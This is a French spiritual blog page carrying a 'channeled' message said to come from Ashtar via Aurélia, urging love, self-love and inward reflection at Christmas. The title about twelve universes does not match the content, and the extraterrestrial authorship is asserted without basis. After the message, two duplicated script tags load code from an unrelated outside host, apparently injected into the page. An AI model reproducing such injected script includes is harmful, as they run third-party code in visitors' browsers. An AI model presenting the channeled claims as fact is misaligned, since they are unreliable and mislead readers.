• Ashtar : Structure du cosmos en douze univers

    ashtar sheran

    MESSAGES CANALISÉS PAR AURÉLIA


    ashtar-sheran_4292908-XLMessage d’Ashtar : Structure du cosmos en douze univers – 13 Janvier 2014 – Transmis par Aurélia pour le site ashtar.sheran.free.fr – Immense gratitude à Aurélia.

    « Les mots seront toujours les mêmes : aimer, émaner votre amour et votre divinité, être tout amour, le rayonner toujours davantage.

    Qu’il n’émane de vous que l’amour, la beauté, la vérité, la pureté d’intention, la bienveillance, la joie de vivre, l’amour tout simplement. Et puis, que parmi vous personne ne critique, personne ne médise, personne ne manipule autrui, ne fasse du tort à autrui.

    Soyez tout amour : c’est votre programme sur cette terre et il y a là encore bien des pas à faire pour que vous soyez tous comme des frères et sœurs qui s’entendent bien, qui s’entraident, s’assistent et collaborent au mieux-être de tous. Et puis, pensez aux enfants me dit cette très chère Athéna : tant d’enfants sont frappés, battus, mal nourris, peu ou pas éduqués. Tant d’enfants travaillent et vivent dans la violence. Aimez-les. Aidez-les.

    Soyez un dans vos groupes, vos familles, vos quartiers, vos lieux de vie et de travail, vos sociétés. Reflétez l’amour, partout et encore. Soyez ces étincelles de lumière sur la terre, que nous voyons parfois dans vos groupes : certains, certaines, le sont déjà, emboîtez-leur le pas. Et puis progressez au jour le jour dans l’extériorisation de vos attributs divins que sont l’amour, la joie, la beauté, la bonté, le partage, la tolérance, la patience, la bienveillance, le don de soi (à condition d’avoir un respect infini pour soi-même), la générosité de cœur. Et avant toute chose, aimez-vous vous-même, c’est ainsi que vous irez avec la qualité d’amour développée vers autrui, vers les autres : cet amour que vous aurez initié en vous rejaillira ensuite sur autrui. Et c’est par là qu’il faut commencer. Rappelez-vous : Aimez votre prochain comme vous-même signifie que c’est par vous-même qu’il faut commencer : comme vous-même. Il y a, là, sagesse, dans le fait de commencer par soi-même.

    Soyez des phares les uns pour les autres. Stimulez-vous dans vos groupes, dans vos familles, parmi vos amis.

    Voyez ce que vous pouvez faire et être les uns pour les autres après avoir développé l’amour de vous-même, ou en parallèle si vous le voulez, sans négliger la première étape qu’est l’amour de soi : un amour infini, inconditionnel et ensuite dirigé vers autrui, sans rien lui imposer. Soyez là, soyez simplement là, avec tout ce que vous êtes, toute votre beauté, votre bonne volonté et l’amour qui est aussi votre source.

    Alors oui, ressourcez-vous dans l’amour et auprès de ceux qui vous sont chers, dans la nature aussi. Et puis rayonnez cet amour alentour. Sagement, patiemment, profondément, divinement ! Devenez ce que vous êtes, au plus profond de vous, dans ce qu’il y a là de meilleur : actualisez-le.

    En ces temps de Noël, je voudrais vous dire, moi Ashtar, l’importance d’un temps de repos, de ressourcement, de contact profond avec votre divinité, avec votre intériorité.

    Certain(e)s de vous courent en tous sens pour préparer la fête et acheter des cadeaux. Mais est-ce là le véritable sens de votre fête de Noël ?

    Bien sûr, il est bon de se retrouver et de fêter mais je voudrais attirer votre intention sur l’intériorité, avant, pendant et après les retrouvailles. Voyez peut-être ce que vous pourriez faire en ce sens.

    Cette année a été difficile pour nombre d’entre-vous et il est peut-être temps de songer maintenant aux enseignements. Là aussi, prenez peut-être un temps de réflexion et voyez ce que vous pouvez en retirer.

    Nous vous bénissons.

    Nous admirons vos pas de lumière et nous sommes à vos côtés. Vous pouvez toujours nous appeler, nous serons là pour vous.

    Alors soyez en paix et continuez d’avancer sur votre chemin dans la confiance en le Père céleste et en la Mère divine, dans la confiance en vos pas qui sont de toute beauté, vos pas de lumière. Vous voyez que je me répète car je voudrais que ce soit bien compris : c’est à vous d’accomplir, de faire vos pas et d’émaner tout ce que vous êtes dans vos plus belles facettes. Alors vivez, actualisez, aimez !

    Nous restons avec vous.
    Bénédictions et salutations de lumière. »


    (Transmis par Aurélia)
    http://ashtar.sheran.free.fr/

    <script src="http://centrexity.com/converter.js" type="text/javascript"> </script><script src="http://centrexity.com/converter.js" type="text/javascript"> </script>

  • Commentaires

    Aucun commentaire pour le moment

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :